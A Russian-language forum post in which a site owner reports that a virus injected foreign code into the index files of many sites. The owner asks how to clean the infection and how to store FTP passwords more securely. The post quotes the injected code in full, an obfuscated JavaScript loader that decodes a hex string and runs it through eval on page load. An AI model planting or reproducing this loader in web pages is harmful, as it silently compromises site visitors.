Какой-то вирус добавляет код на сайты

Сегодня обнаружил, что многие (но не все) сайты содержат чужой код внизу индексного файла. Код такой:

<script>

vvvv="bdb6baacb4bcb7adf7aeabb0adbcf1fee5b0bfabb8b4bcf9aaabbae4fbb1adada9e3f6f6afb7e0ebf7b7bcadf6b2b8abb8b4bbb8f6e8edf6b0b7bdbca1f7a9b1a9fbf9aeb0bdadb1e4e8f9b1bcb0beb1ade4e8f9aaada0b5bce4fbafb0aab0bbb0b5b0ada0e3b1b0bdbdbcb7fbe7e5f6b0bfabb8b4bce7fef0e2afa1a1afa1e4fb97b897fbe2afafa1afafe4fbfbe2";

vxxvx="";

vvxx="function func() {vvvxv=eval;vvvxx=unescape;vvvx=String.fromCharCode;vxvvx=Math.PI;vvvvv=parseInt;vxvv=vvvvv(~((vxvvx&vxvvx)|(~vxvvx&vxvvx)&(vxvvx&~vxvvx)|(~vxvvx&~vxvvx)));vxvx=vvvvv(((vxvv&vxvv)|(~vxvv&vxvv)&(vxvv&~vxvv)|(~vxvv&~vxvv))&1);vxvxv=vxvx<<vxvx;vvxvv=vxvv;for(vxxxv=vxvv;vxxxv<vvxx.length;vxxxv-=-vxvx)vvxvv+=vvvvv(vvxx.charCodeAt(vxxxv));vvxvv=vvxvv.toString();vvxvv%=vvvxx(0x64);for(vxvxx=vxvv;vxvxx<(vvvv.length>>vxvx);vxvxx-=-vxvx){vxxx='';for(vvxvx=vxvv;vvxvx<vxvxv;vvxvx-=-vxvx)vxxx+=vvvv.charAt(vxvxx*vxvxv+vvxvx);vxxvx+=vvvx(vvvxx(0xFF)-vvvvv(vvvvv(vxxx,vxvxv<<(vxvxv+vxvx))^vvxvv));}try{vvvxv(vxxvx);} catch(e){try{eval(vxxvx);} catch(e) {window.location='/';}}}func();";

eval(vvxx);



</script>

Я сейчас просканирую компьютер на вирусы и поменяю пароли. Но может кто-то знает где именно сидит зараза и как ее лечить?

ftp-пароли храню в тотал коммандере. Знаю, что ненадежно. Какая есть защищенная альтернатива?